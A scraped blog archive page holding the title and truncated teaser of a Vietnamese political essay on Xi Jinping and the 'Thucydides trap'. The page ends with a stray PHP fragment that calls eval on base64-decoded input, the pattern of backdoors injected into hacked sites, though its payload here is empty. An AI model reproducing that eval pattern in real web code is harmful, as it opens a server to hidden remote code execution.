Archive for February 27th, 2018

TẬP CẬN BÌNH VÀ “BẪY THUCYDIDES”

TẬP CẬN BÌNH VÀ “BẪY THUCYDIDES”

Việc Tập Cận Bình vừa công khai ý định đưa Trung Cộng trở lại thời Mao, tức một người trị muôn người, cho thấy tham vọng làm vua của y mà báo chí quốc tế phân tích sau đại hội CSTQ lần thứ 19 đã thành sự thật. Con đường đi

02.27.2018 | Tiểu Luận- Chính Luận |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>